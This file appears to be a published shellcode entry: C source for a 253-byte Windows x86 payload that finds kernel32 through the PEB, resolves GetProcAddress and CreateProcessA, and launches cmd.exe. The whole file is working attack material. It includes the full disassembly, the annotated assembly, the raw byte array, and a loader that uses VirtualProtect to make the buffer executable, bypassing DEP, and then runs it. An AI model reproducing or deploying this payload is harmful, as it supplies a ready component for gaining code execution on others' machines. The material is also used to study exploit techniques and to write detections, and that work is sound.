/*
    # Title : Windows x86 CreateProcessA(NULL,"cmd.exe",NULL,NULL,0,NULL,NULL,NULL,&STARTUPINFO,&PROCESS_INFORMATION) shellcode
    # Author : Roziul Hasan Khan Shifat
    # Date : 15-08-2016
    # Tested On : Windows 7 x86
*/
 
 
/*
Disassembly of section .text:
 
00000000 <_start>:
   0:   31 c9                   xor    %ecx,%ecx
   2:   64 8b 41 30             mov    %fs:0x30(%ecx),%eax
   6:   8b 40 0c                mov    0xc(%eax),%eax
   9:   8b 70 14                mov    0x14(%eax),%esi
   c:   ad                      lods   %ds:(%esi),%eax
   d:   96                      xchg   %eax,%esi
   e:   ad                      lods   %ds:(%esi),%eax
   f:   8b 48 10                mov    0x10(%eax),%ecx
  12:   31 db                   xor    %ebx,%ebx
  14:   8b 59 3c                mov    0x3c(%ecx),%ebx
  17:   01 cb                   add    %ecx,%ebx
  19:   8b 5b 78                mov    0x78(%ebx),%ebx
  1c:   01 cb                   add    %ecx,%ebx
  1e:   8b 73 20                mov    0x20(%ebx),%esi
  21:   01 ce                   add    %ecx,%esi
  23:   31 d2                   xor    %edx,%edx
 
00000025 <func>:
  25:   42                      inc    %edx
  26:   ad                      lods   %ds:(%esi),%eax
  27:   01 c8                   add    %ecx,%eax
  29:   81 38 47 65 74 50       cmpl   $0x50746547,(%eax)
  2f:   75 f4                   jne    25 <func>
  31:   81 78 04 72 6f 63 41    cmpl   $0x41636f72,0x4(%eax)
  38:   75 eb                   jne    25 <func>
  3a:   81 78 08 64 64 72 65    cmpl   $0x65726464,0x8(%eax)
  41:   75 e2                   jne    25 <func>
  43:   8b 73 1c                mov    0x1c(%ebx),%esi
  46:   01 ce                   add    %ecx,%esi
  48:   8b 14 96                mov    (%esi,%edx,4),%edx
  4b:   01 ca                   add    %ecx,%edx
  4d:   89 d6                   mov    %edx,%esi
  4f:   89 cf                   mov    %ecx,%edi
  51:   31 db                   xor    %ebx,%ebx
  53:   68 79 41 41 41          push   $0x41414179
  58:   66 89 5c 24 01          mov    %bx,0x1(%esp)
  5d:   68 65 6d 6f 72          push   $0x726f6d65
  62:   68 65 72 6f 4d          push   $0x4d6f7265
  67:   68 52 74 6c 5a          push   $0x5a6c7452
  6c:   54                      push   %esp
  6d:   51                      push   %ecx
  6e:   ff d2                   call   *%edx
  70:   83 c4 10                add    $0x10,%esp
  73:   31 c9                   xor    %ecx,%ecx
  75:   89 ca                   mov    %ecx,%edx
  77:   b2 54                   mov    $0x54,%dl
  79:   51                      push   %ecx
  7a:   83 ec 54                sub    $0x54,%esp
  7d:   8d 0c 24                lea    (%esp),%ecx
  80:   51                      push   %ecx
  81:   52                      push   %edx
  82:   51                      push   %ecx
  83:   ff d0                   call   *%eax
  85:   59                      pop    %ecx
  86:   31 d2                   xor    %edx,%edx
  88:   68 73 41 42 42          push   $0x42424173
  8d:   66 89 54 24 02          mov    %dx,0x2(%esp)
  92:   68 6f 63 65 73          push   $0x7365636f
  97:   68 74 65 50 72          push   $0x72506574
  9c:   68 43 72 65 61          push   $0x61657243
  a1:   8d 14 24                lea    (%esp),%edx
  a4:   51                      push   %ecx
  a5:   52                      push   %edx
  a6:   57                      push   %edi
  a7:   ff d6                   call   *%esi
  a9:   59                      pop    %ecx
  aa:   83 c4 10                add    $0x10,%esp
  ad:   31 db                   xor    %ebx,%ebx
  af:   68 65 78 65 41          push   $0x41657865
  b4:   88 5c 24 03             mov    %bl,0x3(%esp)
  b8:   68 63 6d 64 2e          push   $0x2e646d63
  bd:   8d 1c 24                lea    (%esp),%ebx
  c0:   31 d2                   xor    %edx,%edx
  c2:   b2 44                   mov    $0x44,%dl
  c4:   89 11                   mov    %edx,(%ecx)
  c6:   8d 51 44                lea    0x44(%ecx),%edx
  c9:   56                      push   %esi
  ca:   31 f6                   xor    %esi,%esi
  cc:   52                      push   %edx
  cd:   51                      push   %ecx
  ce:   56                      push   %esi
  cf:   56                      push   %esi
  d0:   56                      push   %esi
  d1:   56                      push   %esi
  d2:   56                      push   %esi
  d3:   56                      push   %esi
  d4:   53                      push   %ebx
  d5:   56                      push   %esi
  d6:   ff d0                   call   *%eax
  d8:   5e                      pop    %esi
  d9:   83 c4 08                add    $0x8,%esp
  dc:   31 db                   xor    %ebx,%ebx
  de:   68 65 73 73 41          push   $0x41737365
  e3:   88 5c 24 03             mov    %bl,0x3(%esp)
  e7:   68 50 72 6f 63          push   $0x636f7250
  ec:   68 45 78 69 74          push   $0x74697845
  f1:   8d 1c 24                lea    (%esp),%ebx
  f4:   53                      push   %ebx
  f5:   57                      push   %edi
  f6:   ff d6                   call   *%esi
  f8:   31 c9                   xor    %ecx,%ecx
  fa:   51                      push   %ecx
  fb:   ff d0                   call   *%eax
*/
 
 
/*
section .text
    global _start
_start:
 
 
xor ecx,ecx
mov eax,[fs:ecx+0x30] ;PEB (TEB.ProcessEnvironmentBlock)
mov eax,[eax+0xc] ;PEB->Ldr (PEB_LDR_DATA)
mov esi,[eax+0x14] ;PEB->Ldr->InMemoryOrderModuleList.Flink: 1st entry (the exe itself)
lodsd ;eax = Flink of the 1st entry -> 2nd entry (normally ntdll.dll)
xchg esi,eax
lodsd ;eax = 3rd entry, assumed to be kernel32.dll (held on the tested Win7 x86; load order is not guaranteed on other builds/loaders)
mov ecx,[eax+0x10] ;LDR_DATA_TABLE_ENTRY.DllBase, reached at +0x10 from InMemoryOrderLinks = kernel32 base address
 
 
xor ebx,ebx
mov ebx,[ecx+0x3c] ;IMAGE_DOS_HEADER.e_lfanew (RVA of the PE signature)
add ebx,ecx ;IMAGE_NT_HEADERS
mov ebx,[ebx+0x78] ;OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress (RVA)
add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
 
mov esi,[ebx+0x20] ;AddressOfNames
add esi,ecx
 
 
;---------------------------------------------
 
xor edx,edx
 
func:
inc edx
lodsd
add eax,ecx
cmp dword [eax],'GetP'
jnz func
cmp dword [eax+4],'rocA'
jnz func
cmp dword [eax+8],'ddre'
jnz func
 
 
;--------------------------------
 
 
mov esi,[ebx+0x1c] ;AddressOfFunctions
add esi,ecx

;NOTE: edx holds the 1-based position of the matched name in AddressOfNames (inc edx runs
;before each lodsd) and is used directly as an index into AddressOfFunctions, skipping the
;AddressOfNameOrdinals table ([ebx+0x24]). That only works when kernel32's export layout makes
;the two indices line up, which held on the tested Windows 7 x86 build; a portable resolver
;maps name index -> ordinal through AddressOfNameOrdinals first.
mov edx,[esi+edx*4]
add edx,ecx ;GetProcAddress()
 
;-------------------------------------
 
mov esi,edx
mov edi,ecx
 
;-------------------------
 
 
xor ebx,ebx
 
 
;finding address of RtlZeroMemory()
 
push 0x41414179
mov [esp+1],word bx
push 0x726f6d65
push 0x4d6f7265
push 0x5a6c7452
 
 
 
push esp
push ecx
 
call edx
 
;------------------------------
add esp,16
;-----------------------------------
 
 
;zero out 84 bytes of stack: STARTUPINFOA (68 bytes) immediately followed by PROCESS_INFORMATION (16 bytes), both handed to CreateProcessA below
 
 
xor ecx,ecx
mov edx,ecx
 
mov dl,84
 
push ecx
 
sub esp,84
 
lea ecx,[esp]
 
push ecx
 
push edx
push ecx
 
call eax
 
 
;----------------------------
 
;finding address of CreateProcessA()
pop ecx
 
xor edx,edx
 
push 0x42424173
mov [esp+2],word dx
push 0x7365636f
push 0x72506574
push 0x61657243
 
lea edx,[esp]
 
push ecx
 
push edx
push edi
 
call esi
 
 
;--------------------------------
;CreateProcessA(NULL,"cmd.exe",NULL,NULL,0,NULL,NULL,NULL,&STARTUPINFO,&PROCESS_INFORMATION)
 
pop ecx
 
add esp,16
 
xor ebx,ebx
push 0x41657865
mov [esp+3],byte bl
push 0x2e646d63
 
lea ebx,[esp]
 
 
xor edx,edx
mov dl,68
 
mov [ecx],edx ;STARTUPINFO.cb = 68 = sizeof(STARTUPINFOA) on x86; every other field stays zero

lea edx,[ecx+68] ;&PROCESS_INFORMATION, located directly after the STARTUPINFO in the zeroed buffer
 
 
push esi ;save GetProcAddress() -- esi is reused below as the NULL argument register
 
xor esi,esi
 
 
push edx
push ecx
 
push esi
push esi
push esi
push esi
push esi
push esi
 
push ebx
push esi
 
call eax ;CreateProcessA(...); the BOOL result is not checked, a failed spawn simply falls through to ExitProcess() below
 
pop esi
 
;-------------------------------------
;finding address of ExitProcess()
 
add esp,8
 
xor ebx,ebx
 
push 0x41737365
mov [esp+3],byte bl
push 0x636f7250
push 0x74697845
 
 
lea ebx,[esp]
 
 
push ebx
push edi
 
call esi
 
xor ecx,ecx
push ecx
call eax
*/
 
 
#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#endif
/*
 * Raw payload: 253 NUL-free bytes (the disassembly above is the
 * instruction-level view of exactly these bytes). The literal is split per
 * stage purely for readability; adjacent string literals are concatenated by
 * the compiler, so the resulting array is identical to one long literal.
 * strlen() in main() is a valid length measure only because no byte is 0x00.
 */
char shellcode[] =
    /* 0x00: kernel32 base from PEB->Ldr->InMemoryOrderModuleList (third entry) */
    "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10"
    /* 0x12: DOS header -> NT headers -> export directory -> AddressOfNames */
    "\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2"
    /* 0x25: scan export names for "GetP" "rocA" "ddre" */
    "\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4"
    "\x81\x78\x04\x72\x6f\x63\x41\x75\xeb"
    "\x81\x78\x08\x64\x64\x72\x65\x75\xe2"
    /* 0x43: AddressOfFunctions[edx] -> GetProcAddress in esi, kernel32 base in edi */
    "\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf"
    /* 0x51: build "RtlZeroMemory\0" on the stack, GetProcAddress(kernel32, it) */
    "\x31\xdb\x68\x79\x41\x41\x41\x66\x89\x5c\x24\x01"
    "\x68\x65\x6d\x6f\x72\x68\x65\x72\x6f\x4d\x68\x52\x74\x6c\x5a"
    "\x54\x51\xff\xd2\x83\xc4\x10"
    /* 0x73: reserve and zero 84 bytes (STARTUPINFOA + PROCESS_INFORMATION) */
    "\x31\xc9\x89\xca\xb2\x54\x51\x83\xec\x54\x8d\x0c\x24\x51\x52\x51\xff\xd0\x59"
    /* 0x86: build "CreateProcessA\0\0", GetProcAddress(kernel32, it) */
    "\x31\xd2\x68\x73\x41\x42\x42\x66\x89\x54\x24\x02"
    "\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61"
    "\x8d\x14\x24\x51\x52\x57\xff\xd6\x59\x83\xc4\x10"
    /* 0xad: build "cmd.exe\0", set cb=68, CreateProcessA(NULL,"cmd.exe",...,&si,&pi) */
    "\x31\xdb\x68\x65\x78\x65\x41\x88\x5c\x24\x03\x68\x63\x6d\x64\x2e\x8d\x1c\x24"
    "\x31\xd2\xb2\x44\x89\x11\x8d\x51\x44"
    "\x56\x31\xf6\x52\x51\x56\x56\x56\x56\x56\x56\x53\x56\xff\xd0\x5e\x83\xc4\x08"
    /* 0xdc: build "ExitProcess\0", resolve it, ExitProcess(0) */
    "\x31\xdb\x68\x65\x73\x73\x41\x88\x5c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x1c\x24"
    "\x53\x57\xff\xd6\x31\xc9\x51\xff\xd0";
 
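/*
 * Loader: prints the payload length and transfers control into it.
 *
 * The bytes live in .data, which is not executable under DEP/NX, so the page
 * is made RWX with VirtualProtect() before the jump (the original jumped into
 * the data section directly and relied on DEP being off). The payload reads
 * the 32-bit PEB via fs:[0x30] and resolves kernel32 exports itself, so it is
 * only meaningful on 32-bit Windows; any other target gets an error message
 * and exit status 1 instead of a crash.
 *
 * Returns 0 on success; in practice the payload calls ExitProcess(0) and
 * control never comes back here.
 */
int main(void)
{
    /* strlen() is usable as the length only because the payload is NUL-free */
    printf("shellcode length %lu\n", (unsigned long)strlen(shellcode));

#if defined(_WIN32) && !defined(_WIN64)
    DWORD old_protect;

    /* make the page(s) holding the array executable; fail loudly instead of faulting */
    if (!VirtualProtect(shellcode, sizeof(shellcode), PAGE_EXECUTE_READWRITE, &old_protect)) {
        fprintf(stderr, "VirtualProtect failed: %lu\n", (unsigned long)GetLastError());
        return 1;
    }

    ((void (*)(void))shellcode)();
    return 0; /* not reached: the payload exits the process itself */
#else
    fputs("this payload targets 32-bit Windows only (PEB at fs:[0x30]); refusing to run\n", stderr);
    return 1;
#endif
}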